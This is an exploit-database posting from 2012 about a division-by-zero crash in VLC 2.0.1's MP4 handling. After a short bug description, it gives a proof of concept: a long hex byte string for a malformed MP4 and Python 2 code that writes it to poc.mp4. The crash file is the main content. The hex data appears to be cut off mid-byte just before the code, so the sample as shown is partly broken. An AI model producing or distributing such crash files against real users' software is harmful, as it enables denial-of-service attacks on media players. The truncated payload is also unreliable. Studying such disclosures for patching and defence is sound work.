VLC 2.0.1 Division By Zero

Posted on 20 April 2012

########################################################################################################### Application : VLC 2.0.1 division by zero vulnerability Versions : 2.0.1 Date : 19/04/2012 Auther : Senator of Pirates E-Mail : Senator.of.Pirates.team@gmail.com FaceBook : /SenatorofPiratesInfo ############################################################################################################ Bug : ---- division by zero vulnerability during the handling of the MP4 files. some values is read from file and will be division so that values it's under control so we have to modified some bytes for occur crash. PoC : ----- Data = "x00x00x00x1Cx66x74x79x70x6Dx70x34x32x00x00x00x00x69x73x6Fx6Dx61x76x63x31x6Dx70x34x32x00x01x19x28x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00xC7x21xFCx5BxC7x21xFCx5Bx00x00x02x58x00x02x22xA8x00x01x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x03x00x00x00x15x69x6Fx64x73x00x00x00x00x10x07x00x4FxFFxFFx29x15xFFx00x00xA5xE5x74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x01xC7x21xFCx5BxC7x21xFCx5Bx00x00x00x01x00x00x00x00x00x02x22x9Cx00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00xFFxFFxFFx00x00x00x00x00x00x00xA5x81x6Dx64x69x61x00x00x00x20x6Dx64x68x64x00x00x00x00xC7x21xFCx5BxC7x21xFCx5Bx00x00x00x00x00x9CxF0x00x55xC4x00x00x00x00x00x42x68x64x6Cx72x00x00x00x00x00x00x00x00x73x6Fx75x6Ex00x00x00x00x00x00x00x00x00x00x00x00x28x43x29x20x32x30x30x37x20x47x6Fx6Fx67x6Cx65x20x49x6Ex63x2Ex20x76x30x38x2Ex31x33x2Ex32x30x30x37x2Ex00x00x00xA5x17x6Dx69x6Ex66x00x00x00x10x73x6Dx68x64x00x00x00x00x00x00x00x00x00x00x00x24x64x69x6Ex66x00x00x00x1Cx64x72x65x66x00x00x00x00x00x00x00x01x00x00x00x0Cx75x72x6Cx20x00x00x00x01x00x00xA4xDBx73x74x62x6Cx00x00x00x5Bx73x74x73x64x00x00x00x00x00x00x00x01x00x00x00x4Bx6Dx70x34x61x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x02x00x10x00x00x00x00xACx44x00x00x00x00x00x27x65x73x64x73x00x00x00x00x03x19x00x00x00x04x11x40x15x00x01xE6x00x02x2Dx38x00x01xCDx28x05x02x12x10x06x01x02x00x00x00x18x73x74x74x73x00x00x00x00x00x00x00x01x00x00x27x3Cx00x00x04x00x00x00x00x28x73x74x73x63x00x00x00x00x00x00x00x02x00x00x00x01x00x00x00x16x00x00x00x01x00x00x01xC9x00x00x00x0Cx00x00x00x01x00x00x9Dx04x73x74x73x7Ax00x00x00x00x00x00x00x00x00x00x27x3Cx00x00x00x09x00x00x00x09x00x00x00x09x00x00x00x09x00x00x00x09x00x00x00x09x00x00x01x6Dx00x00x01x5Fx00x00x01x8Ex00x00x01x76x00x00x01x7Bx00x00x01x72x00x00x01x76x00x00x01x7Ex00x00x01x75x00x00x01x7Bx00x00x01x74x00x00x01x75x00x00x01x71x00x00x01x6Bx00x00x01x61x00x00x01x63x00x00x01x6Dx00x00x01x5Ex00x00x01x66x00x00x01x5Dx00x00x01x55x00x00x01x5Dx00x00x01x66x00x00x01x66x00x00x01x60x00x00x01x59x00x00x01x56x00x00x01x54x00x00x01x68x00x00x01x4Bx00x00x01x4Dx00x00x01x51x00x00x01x4Cx00x00x01x43x00x00x01x40x00x00x01x3Dx00x00x01x2Ex00x00x01x19x00x00x01x12x00x00x01x03x00x00x01x1Dx00x00x01x1Ax00x00x01x16x00x00x01x21x00x00x01x08x00x00x01x18x00x00x01x1Ax00x00x01x09x00x00x00xFFx00x00x00xFFx00x00x01x01x00x00x00xFDx00x00x00xF7x00x00x00xF5x00x00x01x15x00x00x01x1Ax00x00x01x17x00x00x01x09x00x00x01x0Dx00x00x01x11x00x00x01x0Fx00x00x01x14x00x00x01x09x00x00x01x19x00x00x01x03x00x00x01x0Ex00x00x00xF8x00x00x00xEFx00x00x01x0Ex00x00x01x10x00x00x01x12x00x00x01x0Bx00x00x01x0Dx00x00x01x0Cx00x00x01x0Cx00x00x01x11x00x00x01x07x00x00x01x0Ax00x00x01x08x00x00x01x08x00x00x01x00x00x00x01x0Dx00x00x01x09x00x00x01x01x00x00x00xFDx00x00x01x01x00x00x00xFFx00x00x01x05x00x00x01x01x00x00x01x02x00x00x01x09x00x00x00xFCx00x00x00xFEx00x00x00xFDx00x00x01x00x00x00x01x03x00x avi = open('poc.mp4', 'wb+') avi.write(Data) avi.close() print "[-] MP4 file generated"

TOP

Malware :

Last 20

Exploits :

Last 20